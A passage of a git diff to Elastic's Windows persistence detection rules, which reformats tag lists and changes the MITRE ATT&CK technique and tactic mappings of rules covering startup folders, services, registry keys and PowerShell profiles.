"Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,26 +92,26 @@ iam where host.os.type == "windows" and event.code == "4738" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml index cb71605d295..240595008a9 100644 --- a/rules/windows/persistence_msi_installer_task_startup.toml +++ b/rules/windows/persistence_msi_installer_task_startup.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -126,12 +126,27 @@ Windows Installer, through msiexec.exe, facilitates software installation and co [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" @@ -141,31 +156,3 @@ reference = "https://attack.mitre.org/techniques/T1218/007/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.001" -name = "Registry Run Keys / Startup Folder" -reference = "https://attack.mitre.org/techniques/T1547/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index feec07ffa4f..6be85a0e79a 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 21 rule_id = "14dab405-5dd9-450c-8106-72951af2391f" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -75,18 +88,31 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_netsh_helper_dll.toml b/rules/windows/persistence_netsh_helper_dll.toml index d74ccf6386f..ea1754b7177 100644 --- a/rules/windows/persistence_netsh_helper_dll.toml +++ b/rules/windows/persistence_netsh_helper_dll.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -87,18 +87,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.007" name = "Netsh Helper DLL" reference = "https://attack.mitre.org/techniques/T1546/007/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml index 0f4533e272c..70d8729bfdc 100644 --- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml +++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -68,7 +68,21 @@ references = [ risk_score = 47 rule_id = "ce64d965-6cb0-466d-b74f-8d2c76f47f05" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -80,13 +94,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.002" +name = "Additional Email Delegate Permissions" +reference = "https://attack.mitre.org/techniques/T1098/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 78f2542e3ac..419fec79e13 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -110,7 +110,20 @@ references = [ risk_score = 47 rule_id = "5cf6397e-eb91-4f31-8951-9f0eaa755a31" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -128,18 +141,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.013" +name = "PowerShell Profile" +reference = "https://attack.mitre.org/techniques/T1546/013/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index cc52c54c402..9cb6a3c5279 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -106,7 +106,17 @@ references = ["https://www.elastic.co/blog/practical-security-engineering-statef risk_score = 73 rule_id = "7405ddf1-6c8e-41ce-818f-48bea6bcaed8" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" @@ -144,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml index eb9b4bf0b71..477f8078256 100644 --- a/rules/windows/persistence_registry_uncommon.toml +++ b/rules/windows/persistence_registry_uncommon.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -153,53 +153,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique]] -id = "T1176" -name = "Software Extensions" -reference = "https://attack.mitre.org/techniques/T1176/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.002" name = "Screensaver" reference = "https://attack.mitre.org/techniques/T1546/002/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" -[[rule.threat.technique.subtechnique]] -id = "T1547.004" -name = "Winlogon Helper DLL" -reference = "https://attack.mitre.org/techniques/T1547/004/" -[[rule.threat.technique.subtechnique]] -id = "T1547.014" -name = "Active Setup" -reference = "https://attack.mitre.org/techniques/T1547/014/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml index e16151644d7..9bfbeba67ac 100644 --- a/rules/windows/persistence_remote_password_reset.toml +++ b/rules/windows/persistence_remote_password_reset.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -63,7 +63,15 @@ references = [ risk_score = 47 rule_id = "2820c9c2-bcd7-4d6e-9eba-faf3891ba450" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -89,26 +97,26 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml index fbae1bd3fd4..5152e42debf 100644 --- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml +++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,13 +89,19 @@ sequence by host.id, user.name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index d236449f23d..d5fd087cd9d 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ Audit Directory Service Changes (Success) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -93,36 +102,24 @@ any where host.os.type == "windows" and event.code == "5136" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" - +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" [[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index 10040a4d61f..cbd24408d74 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml +++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ references = [ risk_score = 47 rule_id = "78ef0c95-9dc2-40ac-a8da-5deb6293a14e" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -158,36 +167,53 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" [[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml index 587b3378aff..99867689123 100644 --- a/rules/windows/persistence_service_windows_service_winlog.toml +++ b/rules/windows/persistence_service_windows_service_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [transform] [[transform.osquery]] @@ -97,7 +97,15 @@ This rule looks for suspicious services being created with suspicious traits com risk_score = 47 rule_id = "da87eee1-129c-4661-a7aa-57d0b9645fad" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Windows System Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Windows System Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -131,36 +139,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index ef840dc41aa..e142ec77150 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/07" [rule] author = ["Elastic"] @@ -117,31 +117,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml index 3ca6ca332f6..12ea89d5a27 100644 --- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml +++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -100,7 +100,15 @@ This rule looks for unsigned processes writing to the Startup folder locations. risk_score = 47 rule_id = "2fba96c0-ade5-4bce-b92f-a5df2509da3f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] type = "eql" query = ''' @@ -123,18 +131,36 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml index 9adfc9ad184..2458d45409b 100644 --- a/rules/windows/persistence_startup_folder_scripts.toml +++ b/rules/windows/persistence_startup_folder_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -145,18 +145,24 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git 